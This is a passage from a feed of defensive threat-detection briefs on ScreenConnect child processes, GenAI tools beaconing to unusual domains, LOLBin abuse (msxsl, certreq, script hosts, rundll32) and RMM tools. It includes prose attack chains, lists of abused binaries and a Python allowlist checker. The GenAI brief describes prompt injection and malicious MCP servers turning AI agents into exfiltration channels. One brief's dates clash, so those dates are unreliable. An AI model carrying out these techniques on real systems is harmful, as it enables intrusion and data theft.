This detection identifies suspicious child processes spawned by ScreenConnect client processes, such as \u003ccode\u003eScreenConnect.ClientService.exe\u003c/code\u003e or \u003ccode\u003eScreenConnect.WindowsClient.exe\u003c/code\u003e, for example PowerShell or cmd.exe launched with unusual arguments. Commands issued from the ScreenConnect console are carried out on the endpoint by \u003ccode\u003eScreenConnect.ClientService.exe\u003c/code\u003e, which runs as SYSTEM, so an interpreter it spawns inherits that privilege. This activity can indicate abuse of remote access capabilities, leading to data exfiltration, command and control communication, or the establishment of persistence mechanisms. Recent exploitation of CVE-2024-1709 and CVE-2024-1708 has highlighted the risk: both flaws are in the ScreenConnect server, and a compromised server hands the attacker a session on every endpoint enrolled to it.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains unauthorized access to a ScreenConnect deployment, either by exploiting the server (CVE-2024-1709, an authentication bypass that re-exposes the setup wizard, chained with CVE-2024-1708, a path traversal) or through compromised technician credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker uses ScreenConnect to connect to the compromised system remotely.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the ScreenConnect interface to execute commands on the remote system.\u003c/li\u003e\n\u003cli\u003eThe attacker spawns a command interpreter, such as \u003ccode\u003ecmd.exe\u003c/code\u003e, using ScreenConnect. 
This process is a child process of the ScreenConnect client process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003ecmd.exe\u003c/code\u003e to execute malicious commands, such as downloading and executing a malicious payload.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker spawns \u003ccode\u003epowershell.exe\u003c/code\u003e with encoded commands or commands to download and execute malicious payloads from a remote server.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes persistence by creating a scheduled task using \u003ccode\u003eschtasks.exe\u003c/code\u003e or creates a new service using \u003ccode\u003esc.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses tools like \u003ccode\u003enet.exe\u003c/code\u003e to modify user accounts or privileges to maintain access to the compromised system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to unauthorized access to sensitive data, installation of malware, and establishment of persistent access to the compromised system. This can result in data theft, disruption of services, and further lateral movement within the network. 
The number of victims and specific sectors targeted varies depending on the attacker\u0026rsquo;s objectives, but the impact can be significant for organizations relying on ScreenConnect for remote support.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to your SIEM to detect suspicious child processes spawned by ScreenConnect and tune for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for ScreenConnect client processes spawning suspicious child processes like \u003ccode\u003epowershell.exe\u003c/code\u003e, \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003enet.exe\u003c/code\u003e, \u003ccode\u003eschtasks.exe\u003c/code\u003e, \u003ccode\u003esc.exe\u003c/code\u003e, \u003ccode\u003erundll32.exe\u003c/code\u003e, \u003ccode\u003emshta.exe\u003c/code\u003e, \u003ccode\u003ecertutil.exe\u003c/code\u003e, \u003ccode\u003ewscript.exe\u003c/code\u003e, \u003ccode\u003ecscript.exe\u003c/code\u003e, \u003ccode\u003ecurl.exe\u003c/code\u003e, \u003ccode\u003essh.exe\u003c/code\u003e, \u003ccode\u003escp.exe\u003c/code\u003e, \u003ccode\u003ewevtutil.exe\u003c/code\u003e, \u003ccode\u003ewget.exe\u003c/code\u003e, or \u003ccode\u003ewmic.exe\u003c/code\u003e as detailed in the Sigma rules.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process-creation logging to capture the necessary process execution data to activate the rules above.\u003c/li\u003e\n\u003cli\u003eReview and revoke any unauthorized user accounts or privileges that may have been created or modified using tools like \u003ccode\u003enet.exe\u003c/code\u003e as described in the attack chain.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-16T16:10:00Z","date_published":"2024-05-16T16:10:00Z","id":"/briefs/2024-05-screenconnect-child-process/","summary":"This rule identifies suspicious child processes spawned by ScreenConnect client processes, 
potentially indicating unauthorized access and command execution abusing ScreenConnect remote access software to perform malicious activities such as data exfiltration or establishing persistence.","title":"Suspicious ScreenConnect Client Child Process Activity","url":"https://feed.craftedsignal.io/briefs/2024-05-screenconnect-child-process/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Copilot","Cursor","GPT4All","Jan","LM Studio","Ollama","Windsurf","bunx","codex","claude","deno","gemini-cli","genaiscript","grok","koboldcpp","llama-cli","llama-server","npx","pnpm","qwen","textgen","yarn","Confluence Data Center"],"_cs_severities":["medium"],"_cs_tags":["genai","command and control","macos","network connection"],"_cs_type":"advisory","_cs_vendors":["Elastic","Microsoft","Atlassian","GitHub"],"content_html":"\u003cp\u003eThis threat brief addresses the risk of GenAI tools on macOS connecting to unusual domains, which may indicate a compromised state. Attackers can exploit GenAI tools through prompt injection, malicious MCP (Model Context Protocol) servers, or poisoned plugins to establish command-and-control (C2) channels or exfiltrate sensitive data. Given the network access capabilities of AI agents, adversaries may manipulate them to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. The Elastic detection rule \u003ccode\u003e9050506c-df6d-4bdf-bc82-fcad0ef1e8c1\u003c/code\u003e focuses on identifying such anomalous network connections originating from a predefined list of GenAI processes, excluding known legitimate domains. 
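\u003c/p\u003e
\u003cp\u003eAs an added example (not code from the brief or from Elastic\u0026rsquo;s rule), the Python below implements the allowlist check over constructed network events: any listed GenAI process whose destination is not an allowlisted domain, or has no resolved domain at all, is reported. The process names, the allowlist (three vendor API hosts plus a hypothetical internal gateway) and the events are assumptions made for the example.\u003c/p\u003e

```python
# Added example (not from the brief or from Elastic's rule): allowlist check
# for network events from GenAI processes, with label-boundary domain matching.
# Process names, the allowlist and all events below are assumptions made for
# this example.

GENAI_PROCESSES = {'ollama', 'claude', 'codex', 'gemini', 'cursor'}

# Destinations the tools are expected to reach. The first three are the
# vendors' public API or registry hosts; the last is a hypothetical internal
# gateway included to show how a corporate proxy is allowlisted.
ALLOWED_DOMAINS = ('api.anthropic.com', 'api.openai.com', 'registry.ollama.ai',
                   'ai-gateway.corp.example')


def domain_allowed(domain, allowlist=ALLOWED_DOMAINS):
    '''True if domain equals an allowlisted name or is a subdomain of one.

    The comparison is made on label boundaries: 'evilai-gateway.corp.example'
    ends with 'ai-gateway.corp.example' as a string but is a different domain,
    so a plain endswith() check would let it through.
    '''
    d = domain.lower().rstrip('.')           # FQDNs may carry a trailing dot
    for allowed in allowlist:
        a = allowed.lower()
        if d == a or d.endswith('.' + a):
            return True
    return False


def unusual_genai_connections(events):
    '''Events from GenAI processes to destinations outside the allowlist.

    A connection with no resolved domain cannot be allowlisted and is flagged
    as well, because an IP-literal C2 beacon would otherwise be invisible.
    '''
    hits = []
    for e in events:
        if e['process_name'].lower() not in GENAI_PROCESSES:
            continue
        domain = e.get('destination_domain')
        if not domain:
            hits.append((e['process_name'], e['destination_ip'], 'no domain resolved'))
        elif not domain_allowed(domain):
            hits.append((e['process_name'], domain, 'not in allowlist'))
    return hits


# Constructed events; 198.51.100.0/24 and 203.0.113.0/24 are documentation ranges.
SAMPLE_EVENTS = [
    {'process_name': 'ollama', 'destination_domain': 'registry.ollama.ai',
     'destination_ip': '203.0.113.10'},
    {'process_name': 'claude', 'destination_domain': 'api.anthropic.com',
     'destination_ip': '203.0.113.11'},
    {'process_name': 'claude', 'destination_domain': 'evilai-gateway.corp.example',
     'destination_ip': '198.51.100.23'},
    {'process_name': 'cursor', 'destination_domain': None,
     'destination_ip': '198.51.100.23'},
    {'process_name': 'curl', 'destination_domain': 'evilai-gateway.corp.example',
     'destination_ip': '198.51.100.23'},
]

if __name__ == '__main__':
    for hit in unusual_genai_connections(SAMPLE_EVENTS):
        print(hit)
```

\u003cp\u003eThe comparison is made on label boundaries on purpose: a plain \u003ccode\u003eendswith()\u003c/code\u003e check would accept \u003ccode\u003eevilai-gateway.corp.example\u003c/code\u003e because it ends with the allowlisted \u003ccode\u003eai-gateway.corp.example\u003c/code\u003e. On a blocklist, such as the RMM-domain DNS rule, the same sloppy check causes false positives instead of bypasses, but the fix is identical. Because this rule reports everything outside the allowlist, the allowlist has to follow vendor infrastructure changes, which is why the brief recommends reviewing it regularly.\u003c/p\u003e
\u003cp\u003e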
The rule has been actively maintained since its creation on December 4, 2025, with its latest update on April 29, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAdversary compromises a GenAI tool on a macOS system through prompt injection, malicious MCP servers, or poisoned plugins.\u003c/li\u003e\n\u003cli\u003eThe compromised GenAI tool is configured to connect to an attacker-controlled domain for C2.\u003c/li\u003e\n\u003cli\u003eThe GenAI process initiates a network connection attempt to the unusual domain using standard web protocols (HTTP/HTTPS).\u003c/li\u003e\n\u003cli\u003eThe macOS system\u0026rsquo;s network stack resolves the attacker\u0026rsquo;s domain to its corresponding IP address.\u003c/li\u003e\n\u003cli\u003eThe GenAI process sends data to the attacker-controlled domain, potentially including sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the C2 channel to send commands to the compromised GenAI tool.\u003c/li\u003e\n\u003cli\u003eThe GenAI tool executes the commands, potentially leading to further compromise or data exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised GenAI tools can lead to data exfiltration, unauthorized access to sensitive information, and the establishment of persistent C2 channels within an organization\u0026rsquo;s network. The impact ranges from the loss of intellectual property and customer data to the potential disruption of business operations. 
The risk is amplified if the GenAI tool has access to internal systems or sensitive data stores, allowing attackers to pivot and escalate their attacks.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;GenAI Process Connecting to Unusual Domain\u0026rdquo; to your SIEM and tune for your environment (see rule below).\u003c/li\u003e\n\u003cli\u003eEnable process creation and network connection logging on macOS endpoints to collect the data required for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule to determine the legitimacy of the domain and the GenAI process\u0026rsquo;s behavior.\u003c/li\u003e\n\u003cli\u003eBlock any identified malicious domains at the network level (see query in the provided source).\u003c/li\u003e\n\u003cli\u003eReview the GenAI tool\u0026rsquo;s configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection.\u003c/li\u003e\n\u003cli\u003eRegularly update the list of allowed domains in the Sigma rule\u0026rsquo;s filter to account for legitimate updates to GenAI tool infrastructure.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-05-02T14:22:30Z","date_published":"2024-05-02T14:22:30Z","id":"/briefs/2024-05-genai-unusual-domain/","summary":"This rule detects GenAI tools on macOS connecting to unusual domains, potentially indicating command and control activity, data exfiltration, or malicious payload retrieval following compromise via prompt injection, malicious MCP servers, or poisoned plugins.","title":"GenAI Process Connection to Unusual Domain on macOS","url":"https://feed.craftedsignal.io/briefs/2024-05-genai-unusual-domain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud 
Funnel"],"_cs_severities":["low"],"_cs_tags":["defense-evasion","command-and-control","windows","msxsl"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eMsXsl.exe is a Windows utility designed to transform XML data using XSLT stylesheets. Adversaries are known to abuse this utility to execute malicious scripts, bypassing application control and other security measures. This behavior is often used as a defense evasion technique to download or execute malicious payloads. This activity has been observed since at least March 2020. The abuse of msxsl.exe allows attackers to establish command and control or exfiltrate sensitive data without being easily detected, as the tool is a signed Microsoft binary. This matters for defenders because it highlights the need to monitor legitimate system utilities for anomalous behavior, specifically network connections to external IP addresses.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system through unspecified means.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages msxsl.exe to execute a malicious script.\u003c/li\u003e\n\u003cli\u003eMsxsl.exe initiates a network connection to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe script downloads a malicious payload from the external server.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is executed on the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a command and control channel through the network connection.\u003c/li\u003e\n\u003cli\u003eThe attacker performs data exfiltration via the established C2 channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised systems can be used for further malicious activities, including data theft, lateral movement, and deployment of additional malware. 
Successful exploitation can lead to sensitive data exfiltration, disruption of services, or complete system compromise. The low risk score does not represent impact, but instead reflects that the behavior is not always malicious, and may be a feature of normal software operation.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon network connection logging to monitor msxsl.exe network activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Network Connection via MsXsl\u0026rdquo; to your SIEM and tune for your environment to detect suspicious network connections originating from msxsl.exe.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the destination IP address and the parent process of msxsl.exe.\u003c/li\u003e\n\u003cli\u003eWhitelist legitimate uses of msxsl.exe in your environment based on known good processes or applications to reduce false positives.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T10:00:00Z","date_published":"2024-01-30T10:00:00Z","id":"/briefs/2024-01-msxsl-network-connection/","summary":"Msxsl.exe, a legitimate Windows utility, is being abused by adversaries to make network connections to non-local IPs for command and control or data exfiltration, potentially bypassing security measures.","title":"MsXsl.exe Network Connection for Defense Evasion","url":"https://feed.craftedsignal.io/briefs/2024-01-msxsl-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Microsoft Defender XDR","Sysmon Event ID 1 - Process Creation","Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["lolbin","command-and-control","exfiltration","certreq"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThe Windows Certreq utility is a command-line tool used for managing certificates. 
Adversaries may abuse Certreq to download files from or upload data to a remote server by initiating an HTTP POST request. This behavior can be used for command and control (C2) or exfiltration. This technique leverages a legitimate system binary (LOLBin) to evade detection. Elastic has observed this behavior being detected through multiple data sources including Elastic Defend, Microsoft Defender XDR, Sysmon, SentinelOne, and Crowdstrike. This is a cross-industry threat that can affect any organization using Windows.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (e.g., via phishing or exploiting a vulnerability).\u003c/li\u003e\n\u003cli\u003eThe attacker executes Certreq.exe with the \u003ccode\u003e-Post\u003c/code\u003e argument to initiate an HTTP POST request.\u003c/li\u003e\n\u003cli\u003eThe Certreq process attempts to connect to a remote server to send or receive data.\u003c/li\u003e\n\u003cli\u003eThe remote server responds to the Certreq request, potentially delivering a file or receiving exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk (if applicable).\u003c/li\u003e\n\u003cli\u003eThe attacker may execute the downloaded file or further process the exfiltrated data.\u003c/li\u003e\n\u003cli\u003eThe attacker may attempt to clean up the Certreq command from command history or logs to evade detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation could lead to the download and execution of malicious payloads, potentially compromising the affected system and network. Alternatively, sensitive data could be exfiltrated from the target environment. The impact can range from data theft and system compromise to full network intrusion, depending on the attacker\u0026rsquo;s objectives and the data accessed. 
The severity is medium because Certreq is a legitimate tool, and its abuse requires specific command-line arguments and network activity.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Certreq HTTP Post Request\u0026rdquo; to your SIEM to identify potential abuse of Certreq for file transfer.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation logging (Event ID 1) to capture the execution of Certreq.exe and its command-line arguments, enabling detections.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from Certreq.exe for unusual destinations or data transfer patterns using network connection logs.\u003c/li\u003e\n\u003cli\u003eInvestigate any instances of Certreq.exe executing with the \u003ccode\u003e-Post\u003c/code\u003e argument, as this is not typical usage of the utility.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T20:47:00Z","date_published":"2024-01-28T20:47:00Z","id":"/briefs/2024-01-certreq-post/","summary":"Adversaries may abuse the Windows Certreq utility to download files or upload data to a remote URL by making an HTTP POST request, potentially for command and control or exfiltration, which can be detected by monitoring process execution events.","title":"Potential Abuse of Certreq for File Transfer via HTTP POST","url":"https://feed.craftedsignal.io/briefs/2024-01-certreq-post/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Windows Script Host"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","execution","windows","script_interpreter"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eAttackers commonly use Windows Script Host (WSH) scripts as an initial access method or to download tools and utilities. 
This involves using built-in Windows script interpreters like \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e to download executable files from remote destinations. This behavior is significant because it allows attackers to bypass traditional defenses and establish a foothold in the system or download further tools. Defenders should monitor for suspicious network connections initiated by script interpreters followed by the creation of executable files on the system.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system (delivery mechanism not specified in source).\u003c/li\u003e\n\u003cli\u003eThe attacker executes a script using \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe script interpreter makes an outbound network connection to a remote server.\u003c/li\u003e\n\u003cli\u003eThe remote server hosts a malicious executable file (e.g., .exe, .dll).\u003c/li\u003e\n\u003cli\u003eThe script downloads the malicious executable to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe downloaded file is saved to disk.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the downloaded malicious file to establish persistence or further compromise the system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs additional actions, such as lateral movement or data exfiltration (not detailed in the source).\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to the installation of malware, unauthorized access to sensitive data, and further compromise of the affected system. This can result in data breaches, financial losses, and reputational damage. 
The source does not contain specific victim numbers or sectors targeted.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - File Creation\u0026rdquo; to your SIEM to detect the creation of executable files after network activity from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Remote File Download via Script Interpreter - Network Connection\u0026rdquo; to detect network connections from \u003ccode\u003ecscript.exe\u003c/code\u003e or \u003ccode\u003ewscript.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon Event ID 3 (Network Connection) and Event ID 11 (File Create) for enhanced visibility into network and file activity related to script interpreters.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-28T12:00:00Z","date_published":"2024-01-28T12:00:00Z","id":"/briefs/2024-01-28-remote-file-copy-scripts/","summary":"Attackers are using Windows script interpreters (cscript.exe or wscript.exe) to download executable files from remote locations to deliver second-stage payloads or download tools.","title":"Remote File Download via Script Interpreter","url":"https://feed.craftedsignal.io/briefs/2024-01-28-remote-file-copy-scripts/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","SentinelOne Cloud Funnel"],"_cs_severities":["medium"],"_cs_tags":["defense-evasion","command-and-control","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic","SentinelOne"],"content_html":"\u003cp\u003eAttackers often abuse the \u003ccode\u003erundll32.exe\u003c/code\u003e utility to execute malicious Dynamic Link Libraries (DLLs), blending their activity with legitimate system operations. 
This detection identifies instances where \u003ccode\u003erundll32.exe\u003c/code\u003e establishes outbound network connections, particularly when executed without command-line arguments. Such behavior deviates from typical usage and may indicate command and control (C2) activity or other malicious actions. The rule is designed to detect command and control activity where adversaries are using \u003ccode\u003erundll32.exe\u003c/code\u003e without arguments to make external network connections. The rule uses data from Elastic Defend, Sysmon, and SentinelOne to detect this behavior. The rule specifically excludes connections to well-known private and reserved IP ranges to reduce false positives.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a Windows system, possibly through phishing or exploiting a software vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker attempts to execute a malicious DLL using \u003ccode\u003erundll32.exe\u003c/code\u003e without specifying arguments, which is an anomaly.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003erundll32.exe\u003c/code\u003e is invoked with a command line resembling: \u003ccode\u003erundll32.exe \u0026lt;path_to_dll\u0026gt;\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe malicious DLL initiates an outbound network connection to an external IP address.\u003c/li\u003e\n\u003cli\u003eThe network connection attempts to bypass firewall rules by masquerading as a legitimate system process.\u003c/li\u003e\n\u003cli\u003eThe attacker uses this connection to establish a command and control channel.\u003c/li\u003e\n\u003cli\u003eData exfiltration or further exploitation activities occur over the established C2 channel.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data theft, ransomware deployment, or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 
id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows attackers to establish command and control channels on compromised systems, leading to potential data exfiltration, lateral movement within the network, and deployment of ransomware. This can result in significant financial losses, reputational damage, and disruption of business operations. The impact is broad, affecting any Windows environment where \u003ccode\u003erundll32.exe\u003c/code\u003e is used.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Unusual Network Connection via RunDLL32\u003c/code\u003e to your SIEM and tune for your environment to detect unusual network connections made by \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEnable Sysmon process creation and network connection logging to capture necessary events for the Sigma rule.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule, focusing on the parent processes of \u003ccode\u003erundll32.exe\u003c/code\u003e and the destination IP addresses of the network connections.\u003c/li\u003e\n\u003cli\u003eReview and harden firewall rules to prevent unauthorized outbound connections from system processes like \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eImplement application control policies to restrict the execution of unsigned or untrusted DLLs via \u003ccode\u003erundll32.exe\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-26T10:00:00Z","date_published":"2024-01-26T10:00:00Z","id":"/briefs/2024-01-rundll32-network-connection/","summary":"The rule detects unusual outbound network connections made by rundll32.exe, specifically when executed with minimal arguments, which may indicate command and control activity or defense evasion tactics on Windows systems.","title":"Unusual Network 
Connection via RunDLL32","url":"https://feed.craftedsignal.io/briefs/2024-01-rundll32-network-connection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Elastic Endgame","Sysmon","AA_v*.exe","AeroAdmin.exe","AnyDesk.exe","apc_Admin.exe","apc_host.exe","AteraAgent.exe","aweray_remote*.exe","AweSun.exe","AgentMon.exe","B4-Service.exe","BASupSrvc.exe","bomgar-scc.exe","domotzagent.exe","domotz-windows-x64-10.exe","dwagsvc.exe","DWRCC.exe","ImperoClientSVC.exe","ImperoServerSVC.exe","ISLLight.exe","ISLLightClient.exe","fleetdeck_commander*.exe","getscreen.exe","g2aservice.exe","GoToAssistService.exe","gotohttp.exe","jumpcloud-agent.exe","level.exe","LvAgent.exe","LMIIgnition.exe","LogMeIn.exe","Lunixar.exe","LunixarRemote.exe","LunixarUpdater.exe","ManageEngine_Remote_Access_Plus.exe","MeshAgent.exe","Mikogo-Service.exe","NinjaRMMAgent.exe","NinjaRMMAgenPatcher.exe","ninjarmm-cli.exe","parsec.exe","PService.exe","quickassist.exe","r_server.exe","radmin.exe","radmin3.exe","RCClient.exe","RCService.exe","RemoteDesktopManager.exe","RemotePC.exe","RemotePCDesktop.exe","RemotePCService.exe","rfusclient.exe","ROMServer.exe","ROMViewer.exe","RPCSuite.exe","rserver3.exe","rustdesk.exe","rutserv.exe","rutview.exe","saazapsc.exe","ScreenConnect*.exe","session_win.exe","Remote 
Support.exe","smpcview.exe","spclink.exe","Splashtop-streamer.exe","Syncro.Overmind.Service.exe","SyncroLive.Agent.Runner.exe","SRService.exe","strwinclt.exe","Supremo.exe","SupremoService.exe","tacticalrmm.exe","tailscale.exe","tailscaled.exe","teamviewer.exe","ToDesk_Service.exe","twingate.exe","TiClientCore.exe","TSClient.exe","tvn.exe","tvnserver.exe","tvnviewer.exe","UltraVNC*.exe","UltraViewer*.exe","vncserver.exe","vncviewer.exe","winvnc.exe","winwvc.exe","Zaservice.exe","ZohoURS.exe","Velociraptor.exe","ToolsIQ.exe","CagService.exe","ScreenConnect.ClientService.exe","TiAgent.exe","GoToResolveProcessChecker.exe","GoToResolveUnattended.exe","Syncro.Installer.exe"],"_cs_severities":["medium"],"_cs_tags":["remote-access","rmm","command-and-control","persistence"],"_cs_type":"advisory","_cs_vendors":["Elastic","Action1 Corporation","AeroAdmin LLC","Ammyy LLC","Atera Networks Ltd","AWERAY PTE. LTD.","BeamYourScreen GmbH","Bomgar Corporation","DUC FABULOUS CO.,LTD","DOMOTZ INC.","DWSNET OÜ","FleetDeck Inc","GlavSoft LLC","Hefei Pingbo Network Technology Co. Ltd","IDrive, Inc.","IMPERO SOLUTIONS LIMITED","Instant Housecall","ISL Online Ltd.","LogMeIn, Inc.","LUNIXAR SAS DE CV","MMSOFT Design Ltd.","Nanosystems S.r.l.","NetSupport Ltd","NinjaRMM, LLC","Parallels International GmbH","philandro Software GmbH","Pro Softnet Corporation","RealVNC","Remote Utilities LLC","Rocket Software, Inc.","SAFIB","Servably, Inc.","ShowMyPC INC","Splashtop Inc.","Superops Inc.","TeamViewer","Techinline Limited","uvnc bvba","Yakhnovets Denis Aleksandrovich IP","Zhou Huabing","ZOHO Corporation Private Limited","Connectwise, LLC","BreakingSecurity.net","Tailscale","Twingate","RustDesk","Zoho","JumpCloud","ScreenConnect","GoTo"],"content_html":"\u003cp\u003eAttackers commonly abuse legitimate remote monitoring and management (RMM) tools and remote access software for command and control (C2), persistence, and execution of native commands on compromised endpoints. 
These tools provide attackers with the ability to maintain access, execute commands, and move laterally within a network. This detection identifies when a process associated with commonly abused RMM/remote access tools is observed for the first time on a host. The rule is designed to trigger when a new process name or code signature associated with RMM software, or a child process of such software, is seen within a configured history window. This helps defenders quickly identify potentially malicious use of legitimate tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The attacker gains initial access to a target system through various methods, such as exploiting vulnerabilities or using compromised credentials.\u003c/li\u003e\n\u003cli\u003eTool Deployment: The attacker deploys a remote monitoring and management (RMM) tool or remote access software on the compromised endpoint. This may involve downloading and installing the tool, or exploiting existing installations.\u003c/li\u003e\n\u003cli\u003ePersistence: The RMM tool is configured to run persistently on the system, ensuring that the attacker maintains access even after a reboot or other disruption. This may involve creating a service or adding a registry key to ensure the tool starts automatically.\u003c/li\u003e\n\u003cli\u003eCommand and Control: The attacker uses the RMM tool to establish a command and control (C2) channel with the compromised system. This allows them to remotely execute commands, transfer files, and monitor activity on the system.\u003c/li\u003e\n\u003cli\u003eLateral Movement: Using the RMM tool, the attacker moves laterally within the network, compromising additional systems and escalating their access. 
This may involve using the tool to access shared resources or execute commands on other systems.\u003c/li\u003e\n\u003cli\u003eData Exfiltration or Ransomware Deployment: The attacker uses their access to exfiltrate sensitive data from the compromised network or deploy ransomware to encrypt files and demand a ransom payment.\u003c/li\u003e\n\u003cli\u003eCleanup: The attacker may attempt to remove traces of their activity, such as logs or files associated with the RMM tool, to avoid detection.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromise via RMM tools can lead to significant data breaches, financial losses, and reputational damage. The use of legitimate tools makes detection more difficult. Successful attacks can result in ransomware deployment, data theft, and prolonged unauthorized access to sensitive systems. Organizations in all sectors are potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the process creation rule to detect the execution of RMM tools on endpoints based on 